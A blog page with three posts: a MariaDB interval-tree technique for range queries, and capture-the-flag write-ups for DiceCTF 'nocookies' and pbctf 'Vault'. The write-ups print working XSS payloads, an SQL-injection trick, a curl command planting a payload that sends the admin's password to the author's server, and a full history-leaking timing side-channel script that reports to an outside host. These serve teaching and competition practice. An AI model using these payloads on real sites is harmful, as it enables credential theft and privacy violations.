Sunday, May 1, 2022

Finding if an item is a list of ranges stored in a DB

 Recently, I've decided to experiment with making a reporting extension for MediaWiki (Working name "Sofa") as a side project. There are already several options already in this space, notably Cargo, Semantic MediaWiki (SMW) and DynamicPageLst (DPL). However, I think the design space is still a little under explored. My goal is to experiment with some rather different design choices, and see what I end up with. In particular - I want to make one that respects the core wiki philosophy of "quick" - e.g. changes are reflected immediately, and "soft-security", where nothing users can do, whether accidentally or maliciously, cause any (performance) harm but can simply be reverted. Current solutions often require manual cache purging to see changes reflected and can have unpredictable user-dependent performance characteristics where subtle user choices in extreme cases could even cause a DB overload.

I don't want to talk too much about the new extension generally, as that's not what this blog post is about and I am still in the early stages. However one design requirement that left me in a bit of a conundrum is the automatic cache purging one. In the model for this extension, we have ordered lists of items and pages that display a range of items from the list. In order to support cache purging when someone adds a new entry that would appear in a used range, we need some way to store what ranges of items are used by what pages so that given a specific item, we can query which pages use a range containing that item. This turned out to be surprisingly difficult. I thought I'd write a post about the different methods I considered. 

The naive approach

For example we might have the following list of alphabetically ordered items

iditem
17Alpha
12Atom
21Beta
34Bobcat
8Bonsai Tree

And a page might want to include all items between Amoeba and Bobcat (Note that Amoeba is not actually in the list).

In this example, we need someway to record that the page is using items between Amoeba and Bobcat, so if someone inserts Badger into the list, the page using the list gets refreshed.

The natural way of doing this would be a MariaDB table like the following:

list_cache table
idpage_idlist_startlist_end
11234AmoebaBobcat

Along with 2 indicies: one on list_start and the other on list_end.[1]

In the event Badger gets added to the list, we would need to query what pages to refresh. In this structure we would use a query like: SELECT page_id FROM list_cache WHERE "Badger" BETWEEN list_start AND list_end; 

This all works. However there is one problem, to answer that query the DB has to look at a number of rows beside the rows we're interested in. For best performance, we ideally want to make the database look at as few rows as possible to answer our query. Ideally it would only look at rows that are relevant to the answer.

An index in the database is an ordered list of rows from a table - like a phonebook. In this case we have two - one for the start of the range and one for the end. In essence we want information from both, however that's not how it works.

"'badger' BETWEEN list_start AND list_end" is really just a fancy way of saying list_start < 'badger' AND list_end > 'badger'. The RDBMS then has a choice to make: It can use the list_start index, go to the spot in that index where badger would be, and then work its way down to the bottom of the list, checking each row individually for if the second condition is true. Alternatively it can pull up the list_end index and do the same thing but reversed.

However, once it picks an index and goes to it starting place, it has to look at every entry until it hits the beginning (Respectively end) of the index. If the starting place is in the middle of the index, it would have to look at roughly half the rows in order to answer the query. If this system was used at scale and the table had 2 million rows, the database might have to look at a million rows, just to find the 3 that are matching. This is definitely not ideal

 

[1] Potentially you could do a compound index on (list_start,list_end) and (list_end,list_start) instead which allows the DB to look directly at the index instead of constantly looking up each row in the underlying table. I'm unclear on if the benefit of index-condition-pushdown outweighs the increased index size, I suspect it would mildly, but either way things are still rather inefficient.

Interval trees

At this point, like any good programmer, I started googling and trawling stack overflow. Eventually I stumbled upon the article "A Static Relational Interval Tree" by Laurent Martin on the SolidQ blog.

At first glance this seemed the exact solution I was looking for. On second glance - not so much. This is a really cool technique; unfortunately it scales with the number of bits needed to represent the data type you are using. If I was looking at ranges of integers, dates or IP addresses, this would be perfect. Unfortunately I am using strings which take a large number of bits. Nonetheless, I'm going to describe the technique, as I think its really cool, and should be more widely known.

The core idea, is to separate the different ranges into a number of buckets. Each bucket can be queried separately but efficiently - Any row that the DB has to look at, is a row that would match the query. In order to find all the ranges that contain a specific point, you just need to query all the applicable buckets. The number of buckets that are applicable in the worst case is the same as the number of bits needed to represent the data type (hence the applicability to ranges of ints but not long strings).

The end result is: if you are using ranges of 32-bit integer, you would have to do 32 really efficient separate queries (or 1 query after UNIONing them together). For a large DB, this is much better than 1 inefficient query that might read millions of rows or more.

For simplicity, in the explanation I will use 4 bit integers (0-16).

Buckets

So, what are these buckets? They are simply the shared binary prefix of the two ends of the range with a 1 followed by 0's appended to fill out the rest of the binary number. Here are some examples:

Range startRange endShared prefixBucket
10 (1010b)13 (1101b)112 (1100b)
9 (1001b)10 (1010b)1010 (1010b)
9 (1001b)9 (1001b)10019 (1001b)

In the database, we can use virtual columns to have mariaDB manage this for us, using the formula range_end - range_end % POWER(2, FLOOR(LOG( (range_start - 1) ^ range_end)/LOG(2)))

CREATE TABLE ranges (
    id int unsigned PRIMARY KEY AUTO_INCREMENT,
    range_start int NOT NULL,
    range_end int NOT NULL,
    bucket int as (range_end - range_end % POWER(2, FLOOR(LOG( (range_start - 1) ^ range_end)/LOG(2))))
);
CREATE INDEX start on ranges (bucket, range_start);
CREATE INDEX end on ranges (bucket, range_end);

Now we can just insert things like normal, and MariaDB will take care of calculating the bucket number.

Querying

This has the following useful property: Any range assigned to bucket number n must contain the value n. For example, bucket 12 might have the range [10,13] in it, or [12,12], all of which contain the point 12. It would not be able to have the range [10,11] as that does not go through the point 12.

This is useful, since if we have a specific number of interest, we can easily query the bucket to see if it is in there. For example, if we wanted to know all the ranges in bucket 12 containing 9, we can query WHERE bucket = 12 AND range_start <= 9; since if a range is in bucket 12, it must contain the value 12, so any range that starts before or equal 9, must go through 9 in order to get to 12. If we have an index on (bucket, range_start), this is a really efficient query that will only look at the rows that are of interest. Similarly, if the number of interest is greater than the bucket number, we do the same thing, just with range_end >= instead.

Now that we know how to get all the relevant ranges from one bucket efficiently, we just need to figure out what all the relevant buckets are, and we have a solution (remembering that at most log of the data type number of buckets need to be consulted).

Finding the buckets

To find the buckets, we simply take the first x bits of the binary representation and append 1 followed by 0s to fill out the number, for all x.

For example, if we wanted to find all the buckets that are relevant to ranges containing 9 (1001b):

buckets that can contain 9 (1001b)
bits maskedprefixbuckettop or bottom
0
8 (1000)top
11b12 (1100)bottom
210b10 (1010)bottom
3100b9 (1001)top (either)

We would have to look at buckets 8,12,10 and 9. If the bit immediately after the prefix is a 1 (or equivalently if our point >= bucket) we have to look at the top of the bucket, otherwise, we look at the bottom. By this, we mean whether the query is range_end <= point or range_start >= point respectively.

So with that in mind, in our example we would make a query like:

SELECT id, range_start, range_end FROM ranges WHERE bucket = 8 and range_end <= 9
UNION ALL SELECT id, range_start, range_end FROM ranges WHERE bucket = 12 and range_start >= 9
UNION ALL SELECT id, range_start, range_end FROM ranges WHERE bucket = 10 and range_start >= 9
UNION ALL SELECT id, range_start, range_end FROM ranges WHERE bucket = 9 and range_end <= 9;

Which is a union of queries that each individually are very efficient.

To generate this, you might use code like the following (in php):

define( "MAX_BITS", 4 );
function makeQuery ( $target ) {
	$mask = 0;
	$query = '';
	for ( $i = MAX_BITS-1; $i >= 0; $i-- ) {
		$mask = $mask | (1>>$i);
		$tmpMask = $mask ^ (1>>$i);
		$pad = 1 >> $i;
		$bucket = ($target & $tmpMask) | $pad;

		$query .= "SELECT id, range_start, range_end FROM ranges WHERE bucket = $bucket ";
		if ( $target < $bucket ) {
			$query .= "AND range_start >= $target ";
		} else {
			$query .= "AND range_end <= $target ";
		}
		if ( $i != 0 ) {
			$query .= "\nUNION ALL ";
		}
	}
	return $query . ";";
}

 

 

Tuesday, February 8, 2022

Write up for DiceCTF 2022: nocookies

Last weekend I participated in DiceCTF. There was some very interesting challenges and I had a lot of fun. Here is a write-up for one of the challenges I solved.

For this challenge, we're presented with a note-keeping app. It allows storing either plaintext or markdown notes. The main distinction is instead of using cookies, it just asks you for a password on every page load.

The admin bot

The challenge also includes an admin bot, that you can give urls to, to visit. Here is a snippet from its code:

    // make an account
    const username = Array(32)
      .fill('')
      .map(() => Math.floor(Math.random() * 16).toString(16))
      .join('');
    const password = flag;

    const firstLogin = doLogin(username, password);

    try {
      page.goto(`https://no-cookies-${instance}.mc.ax/register`);
    } catch {}

    await firstLogin;

    await sleep(3000);

    // visit the note and log in
    const secondLogin = doLogin(username, password);

    try {
      page.goto(url);
    } catch {}

    await secondLogin;

As we can see from the bot code. It creates an account with a random username, and the password being the flag which we are trying to obtain. Since it first visits one page, and then a second of our choosing, this is a strong hint that the intended solution is some sort of XSS to exfiltrate the password.

The view code

Since I suspected that we were looking for an XSS, and I knew the app supported markdown, a good first place to look was the markdown rendering code. This happened entirely client-side on the view note page. Here is the relevant snippet, with important parts bolded.

<script>
  (() => {
    const validate = (text) => {
      return /^[^$']+$/.test(text ?? '');
    }

    const promptValid = (text) => {
      let result = prompt(text) ?? '';
      return validate(result) ? result : promptValid(text);
    }

    const username = promptValid('Username:');
    const password = promptValid('Password:');

    const params = new URLSearchParams(window.location.search);

    (async () => {
      const { note, mode, views } = await (await fetch('/view', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({
          username,
          password,
          id: params.get('id')
        })
      })).json();

      if (!note) {
        alert('Invalid username, password, or note id');
        window.location = '/';
        return;
      }

      let text = note;
      if (mode === 'markdown') {
        text = text.replace(/\[([^\]]+)\]\(([^\)]+)\)/g, (match, p1, p2) => {
          return `<a href="${p2}">${p1}</a>`;
        });

        text = text.replace(/#\s*([^\n]+)/g, (match, p1) => {
          return `<h1>${p1}</h1>`;
        });
        text = text.replace(/\*\*([^\n]+)\*\*/g, (match, p1) => {
          return `<strong>${p1}</strong>`;
        });
        text = text.replace(/\*([^\n]+)\*/g, (match, p1) => {
          return `<em>${p1}</em>`;
        });
      }

      document.querySelector('.note').innerHTML = text;
      document.querySelector('.views').innerText = views;
    })();
  })();
</script>
 

The first thing I was drawn to was this part:

        text = text.replace(/\[([^\]]+)\]\(([^\)]+)\)/g, (match, p1, p2) => {
          return `<a href="${p2}">${p1}</a>`;
        });

Which looks for syntax like (Link text)[https://urltolinkto.com] and replaces it with a link. A keen eye would notice that the url is allowed to contain double quotes ("), which don't get escaped. This allows you to make extra attributes on the <a> tag. For example (link text)[http://example.com" class="foo] gets turned into <a href="http://example.com" class="foo">link text</a>. This can be used as an XSS by using html event handlers. For example, (link)[https://example.com" onmouseover="alert`1`]. Will make an alert box if you hover over the link with your mouse.

A lack of user interaction 

However, the admin bot doesn't have a mouse, and doesn't interact with the page. So how do we make the xss trigger? We can't tell it to hover over the link

This took me a little while, because I was testing on firefox, but the admin bot uses chrome, and the behaviour is mildly different. Eventually though, I found out that in chrome you can use the autofocus attribute to force focus to the element, and use an onfocus handler to execute code:

(foo)[http://example.com" autofocus=autofocus onfocus="alert`1`]

This will pop the alert box immediately on page view, including for the admin bot

Problem solved right? Wait...

With that, I had assumed I had solved the problem. All I had to do was read the password variable, and send it off to a webserver I control.

So to check if that would work, first I tried:


(foo)[http://example.com" autofocus=autofocus onfocus="alert(password&#x29;]

Note: The ) had to be escaped as &#x29; because the regex stopped at first ")"

...and got a pop-up saying "undefined". Whoops looking back at the view code, I see that const password, is defined in an anonymous arrow function, and my code is executing outside of it (Since its coming from an HTML event handler) so the password variable is not in scope.

At this point, I got stumped for a little bit.

Looking back at the code, I noticed that it was validating the password a bit weirdly

     const validate = (text) => {
      return /^[^$']+$/.test(text ?? '');
    }

It was basically checking that the password has at least 1 character, and does not contain apostrophes or dollar signs. Which is just a bit random. If this was actually important you would do it on the server side. In a CTF, one of the key things to do is look for code that stick out or code that looks like something you wouldn't normally write if writing software. This validate function looked a bit suspicious to me, although to be honest, I only thought that because I was fairly stuck at this point.

 I had a vague memory of early JS having some weird design choices around Regexes. So I decided to read up on RegExp in Javascript. Eventually I found this page https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/RegExp/input which was very relevant to the matter at hand.

 In short, whenever you run a regex in javascript, JS saves the text you ran it on as a static class property, and you can access it later by looking at RegExp.input.

 This is first of all crazy (Thanks JS). However, it seemed perfect for this situation. I assumed that since the password was the last thing .test() was ran on, I could obtain it from RegExp.input

However, there was a problem. All the .replace() calls from the markdown parsing also set RegExp.input overriding the password. It seemed like I was at an impasse.

The app did support plaintext notes, which wouldn't run the problematic .replace() calls. If I could somehow get an XSS in a plaintext note, then I could use the RegExp.input trick

Perhaps the markdown XSS I found was a red herring, and I needed to look elsewhere.

 On to an SQL injection

Looking at the view code, if the note is a plaintext note, then it is inserted directly into the document without any escaping on the client side. All the escaping takes place on the backend at insert time. Lets take a look at the backend code:

 const db = {
  prepare: (query, params) => {
    if (params)
      for (const [key, value] of Object.entries(params)) {
        const clean = value.replace(/['$]/g, '');
        query = query.replaceAll(`:${key}`, `'${clean}'`);
      }
    return query;
  },

[...]
  run: (query, params) => {
    const prepared = db.prepare(query, params);
    console.log( prepared );
    return database.prepare(prepared).run();
  },
};

[...]

  db.run('INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)', {
    id,
    username,
    note: note.replace(/[<>]/g, ''),
    mode,
  });

 

 As you can see, at insert, the app strips < and > when inserting a note in the DB. It doesn't seem like there's any way to get an XSS past that filter.

However, the prepare function has a flaw that lets us manipulate how SQL queries are generated in general.

The prepare function replaces keys like :note with their escaped values one at a time. However, it doesn't check whether the parameter value contains a replacement identifier itself. For example, if your username is :note, the SQL query will become messed up after :note gets replaced in the replacement.

As an example, consider how the following query would be prepared:

db.run( 'INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)',
  {
    id: "12345",
    username: ":note",
    note: ', :mode, 22, 0)-- ',
    mode: '<img src=x onerror="alert(RegExp.input)">',
  }

Lets run through what would happen when preparing this query.

We start with:


INSERT INTO notes VALUES (:id, :username, :note, :mode, 0)

We replace :id with '12345'

INSERT INTO notes VALUES ('12345', :username, :note, :mode, 0)

We replace :username with ':note'

 INSERT INTO notes VALUES ('12345', ':note', :note, :mode, 0)

We replace :note with ',:mode, 22, 0)-- '

 INSERT INTO notes VALUES ('12345', '', :mode, 22, 0)-- '', ',:mode, 22, 0)-- ', :note, :mode, 0)

We replace :mode with '<img src=x onerror="alert(RegExp.input)">'

 INSERT INTO notes VALUES ('12345', '', '<img src=x onerror="alert(RegExp.input)">', 22, 0)-- '', ',:mode, 22, 0)-- ', :note, :mode, 0)

Note that -- is the SQL comment character, so the end result is effectively:

  INSERT INTO notes VALUES ('12345', '', '<img src=x onerror="alert(RegExp.input)">', 22, 0);

 bypassing the XSS filter.

Success

In the end we have inserted a plaintext note containing malicious javascript (Any note that has a mode which is not 'markdown' is considered plaintext).  I visited the page, and I got a pop-up with my password.

Now all we need to do is make a payload that instead of showing the password in an alert box, exfiltrates the password to us.

I pre-registered an account with username ":note" and passwored "password". I then created a note with the following curl command:

$ curl 'https://no-cookies-0ac0b52c95f3abe3.mc.ax/create' -H 'Content-Type: application/json' --data-raw '{"username":":note","password":"password","note":",:mode, 22, 0)-- ","mode":"<img src=x onerror=\"window.location=&quot;https://bawolff.net?&quot;+RegExp.input\">"}'


{"id":"32e8c795bb8b44b74d52d74e261a2942"}

 
 I then input the view url to the admin bot service, waited for the admin bot to visit it and watched my webserver log. Sure enough, I soon saw:

34.139.106.105 - - [06/Feb/2022:08:52:49 +0000] "GET /?dice{curr3nt_st4t3_0f_j4v45cr1pt} HTTP/1.1" 200 5514 "https://no-cookies-0ac0b52c95f3abe3.mc.ax/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/100.0.4855.0 Safari/537.36" 

Thus the flag is dice{curr3nt_st4t3_0f_j4v45cr1pt} 

 

p.s. I hear that RegExp.input isn't the only possible solution. I definitely was not able to think of something like this, but I heard some teams used a really ingenious solution involving replacing the document.querySelector, JSON.stringify functions and re-calling the inner async anon function so that the attacker controlled replaced JSON.stringify function gets called with the password. Which is an absolutely beautiful exploit.

 

 

Monday, October 11, 2021

Write up pbctf 2021: Vault

 This weekend I participated in the 2021 Perfect Blue CTF. This is my writeup for the Vault challenge


Challenge

Can you unlock the secret from the vault?

http://vault.chal.perfect.blue/

Notes The admin will visit http://vault.chal.perfect.blue/

Author: vakzz

dist.zip

 

We're presented with a page containing the numbers 1- 32, along with a report link feature. If you click on the numbers enough layers deep, you'll eventually allowed to put text into the page (Just text, no XSS). The layers form a directory structure in the url.

The report url feature triggers headless chrome to click through a bunch of numbers at random. After it goes 14 layers deep it inputs the flag on to the page. After that it navigates to whatever page you reported. Note: Unlike some of the other challenges, the headless chrome instance is not in incognito mode. This is important for the challenge.

It seems clear, that the goal is to try and find some way to read the history of the browser that visits your page.

Exploit

I spent a lot time banging my head against this one. Surely it should be impossible to see the user's history. That would be a major privacy violation. After all, isn't that why the :visited CSS pseudo-class is so restricted? Turns out its not restricted enough.

In trying to solve this problem, I read through https://xsleaks.dev/ - which is a great resource for unintuitive security properties in browsers. https://xsleaks.dev/docs/attacks/css-tricks/#retrieving-users-history lead me to a chrome bug https://bugs.chromium.org/p/chromium/issues/detail?id=252165 which had a proof of concept for leaking history through timing side channels using :visited pseudo class. The bug is wontfix - I guess browser-vendors at some point just decided to give up on preventing this type of leak. One caveat though, is :visited is totally disabled in incognito mode, so it doesn't work in that mode.

It took some fiddling with the parameters to make the PoC work in the time limit that the report-url bot had. The PoC seemed to be much slower on the report bot than it was locally. I eventually found that using a text-shadow of black 1px 1px 20px, a font-size of 2px, 150 links and 10000 link length gave good results.

 I then modified it to look for vault urls, and had it send the results to my server. See below for the exact code used

Eventually I got a log entry that looked like:

35.236.236.57 - - [10/Oct/2021:09:40:51 +0000] "GET /log?http%3A%2F%2Fvault.chal.perfect.blue%2F17%2F6%2F7%2F28%2F25%2F22%2F32%2F2%2F12%2F2%2F16%2F24%2F6%2F29%2F HTTP/1.1" 404 489 "http://bawolff.net/visitedchrome.html" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4655.0 Safari/537.36"

And sure enough http://vault.chal.perfect.blue/17/6/7/28/25/22/32/2/12/2/16/24/6/29/ had the flag (I think there's some max-age stuff, so it doesn't have the flag anymore)
 

Appendix - timing attack code

I was more concerned with getting the exploit working than nice code, so I took the existing PoC and made minor modifications. The result is some not very clear code. I would encourage you to look at the original PoC linked from https://bugs.chromium.org/p/chromium/issues/detail?id=252165#c2 first. To be clear, all the smart stuff about this was not made by me

<!DOCTYPE html>
<html>
<head>
<style>
#out a { color: blue }
#out a:visited { color: purple }
</style>
<style>
#out { 
  font-size: 5px; 
  overflow: hidden; 
  padding: 20px; 
  width:35%;
}
#stats { position:absolute; right:0; top: 60px; left: 40%}
p { margin: 4px 0 }
.linklist span.visited { visibility: hidden; color: white;  background: green; border-radius: 5px;  padding: 2px; font-size: 8pt }
.linklist span.visited.yes { visibility: visible }
.linklist .timings { font-family: monospace; font-size:8pt }
</style>
</head>
<body onload="updateParams()">
<h1>Detecting Visited Links via Redraw Timing</h1>
<div xonkeyup="updateParams()">
<p>text-shadow: <input id="text-shadow" value="black 1px 1px 20px" size="50"></p>
<p>opacity: <input id="opacity" size="2" value="1"> font-size: <input id="font-size" size="2" value="3">px</p>
<p>Links: <input id="textlines" value="150" size="2"> Link Length: <input id="textlen" value="10000" size="2"></p>

</div>
<div id="out" >

</div>

<div id="stats">
<p>Current URL: <span id="currentURL"></span></p>
<p id="nums"></p>
<button onclick="updateParams()">Start</button><button onclick="stop=true">Stop</button>
<div id="log"></div>
</div>
<script>
function log(param) {
	x = new XMLHttpRequest;
	x.open( 'GET', 'http://bawolff.net/log?' + encodeURIComponent(param), true );
	x.send();
	console.log( param );
}
log( "start" );
var baseUrl = 'http://vault.chal.perfect.blue/';
var urls;
function updateUrls(setup) {
	urls = [document.location.href, 'http://notvisited' + ((Math.random()*100000000)|0)+'.foo' ]
	for ( i = 1; i <=32; i++ ) {
		urls[urls.length] = baseUrl + i + '/';
	}
	if (setup) {
	setupLinks();
	}
}
updateUrls();
requestAnimationFrame = window.requestAnimationFrame || window.mozRequestAnimationFrame ||  
   window.webkitRequestAnimationFrame || window.msRequestAnimationFrame;  
   
var out = document.getElementById('out');
var currentURLout = document.getElementById('currentURL');

var linkspans = [];
var timespans = [];
var counter = 0;
var posTimes = [];
var negTimes = [];

var stop = true;
var start;
var currentUrl = 0;
var calibIters = 10;

function initStats() {
  currentUrl = 0;
  start = NaN;
  counter = 0;
  posTimes = [];
  negTimes = [];
  if (stop) {
    stop = false;
    loop();
  }
}

function updateParams() {
  out.style.textShadow = document.getElementById('text-shadow').value;
  out.style.opacity = parseFloat(document.getElementById('opacity').value);
  out.style.fontSize = document.getElementById('font-size').value + 'px';
  textLines = parseInt(document.getElementById('textlines').value);
  textLen = parseInt(document.getElementById('textlen').value);
	log( "trying-" + textLines + '-' + textLen );
  write();
  resetLinks();
  initStats();
}
function write() {
  var s = '';
  var url = urls[currentUrl];
  var text ='';
  while (text.length < textLen)
    text += '#';
    
  for (var i=0; i<textLines; i++) {
    s += "<a href="+url;
    s += ">"+text;
    s += "</a> ";
  }
  out.innerHTML = s;
}

function updateLinks() {
  var url = urls[currentUrl];
  for (var i=0; i<out.children.length; i++) {
    out.children[i].href = url;
    out.children[i].style.color='red';
    out.children[i].style.color='';
  }
}

function resetLinks() {
  for (var i=0; i<out.children.length; i++) {
    out.children[i].href = 'http://' + Math.random() + '.asd';
    out.children[i].style.color='red';
    out.children[i].style.color='';
  }
}

function median(list){
	list.sort(function(a,b){return a-b});
	if (list.length % 2){
		var odd = list.length / 2 - 0.5;
		return list[odd];
	}else{
		var even = list[list.length / 2 - 1];
		even += list[list.length / 2];
		even = even / 2;
		return even;
	}
}

var attempts = 0;
function loop(timestamp) {
  if (stop) return;
  
  var diff = (timestamp - start) | 0;
  start = timestamp;

  if (!isNaN(diff)) {
    counter++;
    if (counter%2 == 0) {
      resetLinks();
      if (counter > 4) {
        if (currentUrl == 0) { // calibrating visited
          document.getElementById('nums').textContent = 'Calibrating...';
          posTimes.push(diff);
          timespans[currentUrl].textContent = posTimes.join(', ');
        }
          
        if (currentUrl == 1) { // calibrating unvisited
          negTimes.push(diff);
          timespans[currentUrl].textContent = negTimes.join(', ');
          if (negTimes.length >= calibIters) {
            var medianPos = median(posTimes);
            var medianNeg = median(negTimes);
            
            // if calibration didn't find a big enough difference between pos and neg, 
            // increase number of links and try again
            if (medianPos - medianNeg < 60) {
              document.getElementById('textlines').value = textLines + 50;
              document.getElementById('textlen').value = textLen + 2;
              stop = true;
              updateParams();
              return;
            }

            threshold = medianNeg + (medianPos - medianNeg)*.75;
            document.getElementById('nums').textContent = 'Median Visited: ' + medianPos + 'ms  / Median Unvisited: ' + medianNeg + 'ms / Threshold: ' + threshold + 'ms';
	    log( "Calibrated " + textLines +';' + textLen + '. Median Visited: ' + medianPos + 'ms  / Median Unvisited: ' + medianNeg + 'ms / Threshold: ' + threshold + 'ms' + ' diff:' + (medianPos - medianNeg) );
            timeStart = Date.now();
          }
        }
        
        if (currentUrl >= 2) {
            timespans[currentUrl].textContent = diff;
            linkspans[currentUrl].className = (diff >= threshold)? 'visited yes' : 'visited';
            incUrl = true;
	    if ( diff >= threshold ) {
		stop = true;
		attempts = 0;
	    	log( urls[currentUrl] );
		baseUrl = urls[currentUrl];
		updateUrls(false);
		currentUrl = 2;
		stop = false;
  		requestAnimationFrame(loop);
		//updateParams();
		return;
	    }
        }
        
        currentUrl++;
        
        // keep testing first two links until calibration is completed
        if (currentUrl == 2 && (negTimes.length < calibIters || posTimes.length < calibIters))
          currentUrl = 0;
         
        if (currentUrl == urls.length) {
		if (attempts > 5 ) {
          timeElapsed = (Date.now() - timeStart) / 1000;
          log("DONE: Time elapsed: " + timeElapsed + "s, tested " + (((urls.length -2)/timeElapsed)|0) + " URLs/sec"); 
          stop = true;
		} else {
			attempts++;
			log( "Trying again" );
			currentUrl = 2;
		}
          
       }
          
        currentURLout.textContent = urls[currentUrl];
        
      }
    } else {
      updateLinks();
    }
  }
  requestAnimationFrame(loop);
}

function setupLinks() {
  var table = document.createElement('table');
  table.innerHTML = '<tr><th></th><th>URL</th><th>Times (ms)</th></tr>';
  table.className = 'linklist';
  for (var i=0; i < urls.length; i++) {
    var a = document.createElement('a');
    a.href = urls[i];
    a.textContent = urls[i];
    var times = document.createElement('span');
    times.className = 'timings';
    var tick = document.createElement('span');
    tick.textContent = '\u2713';
    tick.className = 'visited';
    var tr = document.createElement('tr');
    for (var j=0; j<3; j++) 
      tr.appendChild(document.createElement('td'));
    tr.cells[0].appendChild(tick);
    tr.cells[1].appendChild(a);
    tr.cells[2].appendChild(times);
    table.appendChild(tr);
    
    timespans[i] = times;
    linkspans[i] = tick;
 
  }
  document.getElementById('log').appendChild(table);
}
setupLinks();


//setTimeout(loop, 2000);

</script>
</body>
</html>